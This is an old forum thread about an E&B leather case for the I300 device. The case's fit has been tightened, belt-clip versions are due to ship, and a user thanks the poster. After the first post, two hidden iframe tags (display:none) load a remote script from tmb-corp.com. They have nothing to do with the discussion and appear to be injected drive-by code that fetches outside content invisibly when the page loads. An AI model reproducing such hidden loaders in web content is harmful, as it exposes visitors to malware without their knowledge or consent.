+ Reply to Thread

E&B Case Fit Update

Hey everyone,

Got word today from E&B that the case designer has in fact made the fit of the I300 Slipper much more snug as per my comments to him and that the current batch of cases shipping from E&B do indeed incorportate this tighter fit. This was my only concern with this case and as it has seemingly been taken care of, I encourage all who are looking for a high quality leather case for their I300 to seriously consider this case. Also, E&B is expecting a shipment of the belt-clip version cases later this week or early next week so those that preordered that case in December should expect the case shortly.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I have forgotten who was coordinating, or attempting at least, the group purchase. Any luck?

Re: E&B Case Fit Update

Originally posted by Marty
    Hey everyone,

Got word today from E&B that the case designer has in fact made the fit of the I300 Slipper much more snug as per my comments to him and that the current batch of cases shipping from E&B do indeed incorportate this tighter fit. This was my only concern with this case and as it has seemingly been taken care of, I encourage all who are looking for a high quality leather case for their I300 to seriously consider this case. Also, E&B is expecting a shipment of the belt-clip version cases later this week or early next week so those that preordered that case in December should expect the case shortly.
    Thanks, that was my only concern. Seems to be money well spent. Got email confirmation today about shipping mine out.